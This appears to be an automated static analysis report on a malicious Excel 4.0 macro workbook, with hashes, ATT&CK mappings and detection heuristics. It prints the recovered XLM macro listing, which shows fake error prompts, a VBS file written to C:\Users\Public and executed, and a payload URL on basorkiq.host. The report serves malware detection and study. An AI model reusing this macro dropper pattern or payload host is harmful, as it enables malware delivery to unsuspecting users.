Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f707debe209abf90…

MALICIOUS

Office (OLE)

191.5 KB Created: 2020-01-29 12:25:38 Authoring application: Microsoft Excel First seen: 2020-09-24
MD5: a189d829ac08b29093100a281481bad3 SHA-1: c5308a60a9a4590f56724e69068ded9d792ebaa2 SHA-256: f707debe209abf90114d05ab0dfeee0eff806ed678c3e7a14c98cd7bc338d98e
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains Excel 4.0 macros with an Auto_Open entry that attempts to execute a VBScript. The script is designed to be run using 'cscript //Nologo C:\Users\Public\2.vbs' and points to the URL 'https://basorkiq.host/BKDJs72d' for its payload. This indicates a macro-based downloader attempting to fetch and execute a second-stage payload.

Heuristics 7

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA project contains no executable statements low OLE_VBA_MACROS
    Document contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://basorkiq.host/BKDJs72d In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 2648 bytes
SHA-256: 8a90b1d7b58f25c2dfa74c1a42df8cd54007d481be0586a5d08a02bdf5e9ecae
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Macro1
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!A1 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,L2,"",1.00000000000000000000
'  Sheet,E3,"",6.00000000000000000000
'  Macro1,A1,"IF(GET.WORKSPACE(19),,CLOSE(TRUE))",""
'  Macro1,A2,"IF(ALERT("We found a problem with some content. Do you want to try to recover as much as we can?",1),,CLOSE(TRUE))",""
'  Macro1,A3,"FOPEN("C:\Users\Public\2.vbs",3)",""
'  Macro1,A4,"MESSAGE(TRUE,"One moment please...")",""
'  Macro1,A5,"['A1', 'FWRITELN(GET.NOTE(D5))']",""
'  Macro1,A6,"['A1', 'FWRITELN(GET.NOTE(D6))']",""
'  Macro1,A7,"['A1', 'FWRITELN(GET.NOTE(D7))']",""
'  Macro1,A8,"['A1', 'FWRITELN(GET.NOTE(D8))']",""
'  Macro1,A9,"['A1', 'FWRITELN(GET.NOTE(D9))']",""
'  Macro1,A10,"['A1', 'FWRITELN(GET.NOTE(D10))']",""
'  Macro1,A11,"['A1', 'FWRITELN(GET.NOTE(D11))']",""
'  Macro1,A12,"['A1', 'FWRITELN(GET.NOTE(D12))']",""
'  Macro1,A13,"['A1', 'FWRITELN(GET.NOTE(D13))']",""
'  Macro1,A14,"['A1', 'FWRITELN(GET.NOTE(D14))']",""
'  Macro1,A15,"['A1', 'FWRITELN(GET.NOTE(D15))']",""
'  Macro1,A16,"['A1', 'FWRITELN(GET.NOTE(D16))']",""
'  Macro1,A17,"['A1', 'FWRITELN(GET.NOTE(D17))']",""
'  Macro1,A18,"['A1', 'FWRITELN(GET.NOTE(D18))']",""
'  Macro1,A19,"['A1', 'FWRITELN(GET.NOTE(D19))']",""
'  Macro1,A20,"['A1', 'FWRITELN(GET.NOTE(D20))']",""
'  Macro1,A21,"['A1', 'FWRITELN(GET.NOTE(D21))']",""
'  Macro1,A22,"['A1', 'FWRITELN(GET.NOTE(D22))']",""
'  Macro1,A23,"['A1', 'FWRITELN(GET.NOTE(D23))']",""
'  Macro1,A24,"['A1', 'FWRITELN(GET.NOTE(D24))']",""
'  Macro1,A25,"['A1', 'FWRITELN(GET.NOTE(D25))']",""
'  Macro1,A26,"['A1', 'FWRITELN(GET.NOTE(D26))']",""
'  Macro1,A27,"['A1', 'FWRITELN(GET.NOTE(D27))']",""
'  Macro1,A28,"['A1', 'FWRITELN(GET.NOTE(D28))']",""
'  Macro1,A29,"['A1', 'FWRITELN(GET.NOTE(D29))']",""
'  Macro1,A30,"['A1', 'FWRITELN(GET.NOTE(D30))']",""
'  Macro1,A31,"['A1', 'FWRITELN(GET.NOTE(D31))']",""
'  Macro1,A32,"['A1', 'FWRITELN(GET.NOTE(D32))']",""
'  Macro1,A33,"['A1', 'FWRITELN(GET.NOTE(D33))']",""
'  Macro1,A34,FCLOSE(A1),""
'  Macro1,A35,"IF(GET.WORKSPACE(42),EXEC(GET.NOTE(D35)),CLOSE(TRUE))",""
'  Macro1,A36,WAIT(NOW()+"00:00:05"),""
'  Macro1,A37,"IF(ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2),EXEC(GET.NOTE(D37)),)",""
'  Macro1,A38,CLOSE(TRUE),""
'  Macro1,A39,HALT(),""
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 638 bytes
SHA-256: 7e4b58cedda3f5ed182e29cd7d64b120e247db44f87201b7ab978a388cc14c49
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Open this report in the interactive analyzer, or submit your own file for analysis.